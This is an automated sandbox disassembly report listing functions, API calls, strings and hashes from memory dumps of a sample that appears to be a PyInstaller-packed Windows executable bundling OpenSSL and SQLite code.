Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: c283634f10ea9c9b3aad7e49e69224c42e9663f61968a2266fcf15f34fb443d6
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 1D31E832708B5142EB209B69F8542AA7796BF88798F414136EF4DD7769EF3CD546C300

Function 00007FFDFAAB1497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDFAB092A3
HMAC, xrefs: 00007FFDFAB0928B
tls_construct_stoc_cookie, xrefs: 00007FFDFAB08F8F, 00007FFDFAB091BE, 00007FFDFAB0934C, 00007FFDFAB093C8, 00007FFDFAB0943D
SHA2-256, xrefs: 00007FFDFAB092D7
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDFAB08F9B, 00007FFDFAB091CA, 00007FFDFAB09353, 00007FFDFAB093D4, 00007FFDFAB09444

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
API String ID: 0-1087561517
Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction ID: 510fd5f302365f43d24562bde6a4bd918cf26b59e3daa872ae512ed178e97c9c
Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction Fuzzy Hash: E9D15C65B0865340FB68AA62D571BFD2391AF45788FC880B2DD2E47BCEDE3DE5068350

Function 00007FFDFAAB26E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

..\s\ssl\ssl_rsa.c, xrefs: 00007FFDFAADA52D, 00007FFDFAADA56E, 00007FFDFAADA62D, 00007FFDFAADA69B, 00007FFDFAADA6F6, 00007FFDFAADA70F, 00007FFDFAADA729, 00007FFDFAADA7A8, 00007FFDFAADA7DE, 00007FFDFAADA802, 00007FFDFAADA832, 00007FFDFAADA856, 00007FFDFAADA878, 00007FFDFAADA88E, 00007FFDFAADA8A4, 00007FFDFAADA8BA
SERVERINFO FOR , xrefs: 00007FFDFAADA5E6
SERVERINFOV2 FOR , xrefs: 00007FFDFAADA650
SSL_CTX_use_serverinfo_file, xrefs: 00007FFDFAADA521, 00007FFDFAADA562, 00007FFDFAADA626, 00007FFDFAADA79C, 00007FFDFAADA7D2, 00007FFDFAADA7FB, 00007FFDFAADA826, 00007FFDFAADA84A

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
API String ID: 0-2528746747
Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction ID: 0be6970b3b8fc0c6c1d2b94d6f812baeb9c17264f55ce6cdcf618141e46df819
Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction Fuzzy Hash: BCB19F65B1864385FB19AB62D860AFC27A1BF40784F8440B2DD7D47BDDEE3CE60A8350

Function 00007FFDFB0F8F60 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFB13D0A0), ref: 00007FFDFB0F90FD

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0F8FAA
%s at line %d of [%.10s], xrefs: 00007FFDFB0F8FC3
misuse, xrefs: 00007FFDFB0F8FB7
API called with finalized prepared statement, xrefs: 00007FFDFB0F8F8C
API called with NULL prepared statement, xrefs: 00007FFDFB0F8F74

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 2142204133-3538577999
Opcode ID: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
Instruction ID: e3d2ce0c4fff4e1c0c7c24919622168c3af02abdc035857637c61f0fbd5ac263
Opcode Fuzzy Hash: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
Instruction Fuzzy Hash: E751AE22F0B68389FB55AB15D820AB96B91EF82B94F484131DE7D473FDDE2DE445A300

Function 00007FF6BA3ADCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD4D
GetLastError.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD85
FreeLibrary.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDF3
GetProcAddress.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDFF

Strings

api-ms-, xrefs: 00007FF6BA3ADD6D

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 5a3d4ed180d81392a6cf4a3dafeded7478e206175eca9272761dd2187bd56e02
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: BF31A421B1A76291EE129B1AE8006B973A5FF48BE4F594575DF5ECB384EF3CE4448300

Function 00007FF6BA3A2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6BA3A351A,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A2AA0

Strings

Warning, xrefs: 00007FF6BA3A2B1E
[PYI-%d:%s] , xrefs: 00007FF6BA3A2AA8
Warning [ANSI Fallback], xrefs: 00007FF6BA3A2B0F
WARNING, xrefs: 00007FF6BA3A2AAF
0, xrefs: 00007FF6BA3A2B16

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: a8182a23c13780e6401c92c9fd7fc8c48b500facf54e986c4a195ee16457a5a2
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 37217F32A19B9192E7209B59F8817EA6394BB88784F404176EF8DC3659EF7CD1858740

Function 00007FF6BA3A8570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6BA3A8590
OpenProcessToken.ADVAPI32 ref: 00007FF6BA3A85A3
GetTokenInformation.ADVAPI32 ref: 00007FF6BA3A85C8
GetLastError.KERNEL32 ref: 00007FF6BA3A85D2
GetTokenInformation.ADVAPI32 ref: 00007FF6BA3A8612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6BA3A862E
CloseHandle.KERNEL32 ref: 00007FF6BA3A8646

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction ID: a1a13a9c21bb540d1afd7dfa216c21187366486237ffc4c511fbdf12f5af6df1
Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction Fuzzy Hash: 2F212C31A0CB5242EA509B59F94422EA7A5FF857A0F504275EF6DC3BE8EF7CD4458B00

Function 00007FF6BA3BB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6BA3BB15F
FlsGetValue.KERNEL32 ref: 00007FF6BA3BB174
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB195
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB1C2
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB1D3
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB1E4
SetLastError.KERNEL32 ref: 00007FF6BA3BB1FF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
Instruction ID: 5dd915d36b36404ce86f70dc1682120da8bfa279304a69ed4c3c173e70c50d0f
Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
Instruction Fuzzy Hash: E1213B20F0CA5682FA68AB6D9A5113962535F447F0F9447B4DF7EC7AE6DE2DF8418300

Function 00007FF6BA3C7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6BA3C7D9D
GetLastError.KERNEL32 ref: 00007FF6BA3C7DA9
CloseHandle.KERNEL32 ref: 00007FF6BA3C7DC1
CreateFileW.KERNEL32 ref: 00007FF6BA3C7DEC
WriteConsoleW.KERNEL32 ref: 00007FF6BA3C7E0B

Strings

CONOUT$, xrefs: 00007FF6BA3C7DCD

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: f22df984048e9a670526796e3420dbc5eed755ff80c208596407c63db79874fd
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 8B118E21A18B5186E7508B2AFC55329A6A0FB88BE4F104274EF9DC77A4EF3CD854C740

Function 00007FFDFAAB2310 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 391COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFAB1808D

Strings

resumption, xrefs: 00007FFDFAB183AA
..\s\ssl\statem\statem_clnt.c, xrefs: 00007FFDFAB18024, 00007FFDFAB180AB, 00007FFDFAB180C7, 00007FFDFAB182DE, 00007FFDFAB1837D, 00007FFDFAB183FA, 00007FFDFAB18444, 00007FFDFAB18476
tls_process_new_session_ticket, xrefs: 00007FFDFAB1801D, 00007FFDFAB182D2, 00007FFDFAB18371, 00007FFDFAB1843D
SHA2-256, xrefs: 00007FFDFAB1825C

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
API String ID: 3568877910-1635961163
Opcode ID: 328c265f7e45922d66e428d189de535ccae6df59de94a9472eb2a2702a0404c6
Instruction ID: fd1dbb82ba61f8ff300e80d574cd2c6cb95eea603b548365313fe6cf7973f7e9
Opcode Fuzzy Hash: 328c265f7e45922d66e428d189de535ccae6df59de94a9472eb2a2702a0404c6
Instruction Fuzzy Hash: 3502BE32B08A8281E7698F55E460BAD77A0FB84B84F948176DEAC477D9CF3CE585C700

Function 00007FFDFB15EDE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB15EE86

Strings

vtable constructor called recursively: %s, xrefs: 00007FFDFB15EFB2
hidden, xrefs: 00007FFDFB15F27D
vtable constructor did not declare schema: %s, xrefs: 00007FFDFB15F138
vtable constructor failed: %s, xrefs: 00007FFDFB15EFF9

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 2142204133-1299490920
Opcode ID: fabbb4d1d20f4139f00e6ea10005f669c0fc0d99471c8184c1bd31ed3a32835f
Instruction ID: e8327a2d5d205732dc3e298bbbec725d7fb75ea55f9ddc3d8a2b32d43d087eb4
Opcode Fuzzy Hash: fabbb4d1d20f4139f00e6ea10005f669c0fc0d99471c8184c1bd31ed3a32835f
Instruction Fuzzy Hash: 4202AC63B0AB8682EB518B11D560BBA77A1FB45B88F444232EE6D477E8DF3CE541C300

Function 00007FF6BA3A8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8F5A

Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A906A

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction ID: ca174d3faf54e9f5f0cfa029f881c9ac89c01321f0ff62ee77fcfafd13dbbd69
Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction Fuzzy Hash: 7141BC62B19A9281EE309B5AE4102BEB3A6FB85BC4F444175DF8DE7789DE3CE500C700

Function 00007FFDFB0EC000 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 366COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0EC14D
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0EC2A7

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0EC0F3, 00007FFDFB0EC23A
database corruption, xrefs: 00007FFDFB0EC100, 00007FFDFB0EC247
%s at line %d of [%.10s], xrefs: 00007FFDFB0EC10C, 00007FFDFB0EC253

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2142204133-3727861699
Opcode ID: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
Instruction ID: 3be5fdbbb90781cf63489c953f212562c33a0e77be59c8a5217f0da86b42cd74
Opcode Fuzzy Hash: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
Instruction Fuzzy Hash: F3F18C7370AB8296D7A48B55E050BAD77A0FB46BC4F108036EE9E43BA9DF39D844D700

Function 00007FF6BA3A90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3A8570: GetCurrentProcess.KERNEL32 ref: 00007FF6BA3A8590
Part of subcall function 00007FF6BA3A8570: OpenProcessToken.ADVAPI32 ref: 00007FF6BA3A85A3
Part of subcall function 00007FF6BA3A8570: GetTokenInformation.ADVAPI32 ref: 00007FF6BA3A85C8
Part of subcall function 00007FF6BA3A8570: GetLastError.KERNEL32 ref: 00007FF6BA3A85D2
Part of subcall function 00007FF6BA3A8570: GetTokenInformation.ADVAPI32 ref: 00007FF6BA3A8612
Part of subcall function 00007FF6BA3A8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6BA3A862E
Part of subcall function 00007FF6BA3A8570: CloseHandle.KERNEL32 ref: 00007FF6BA3A8646

LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A916C
LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A9175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6BA3A9183
S-1-3-4, xrefs: 00007FF6BA3A9121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6BA3A9142
D:(A;;FA;;;%s), xrefs: 00007FF6BA3A9157

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
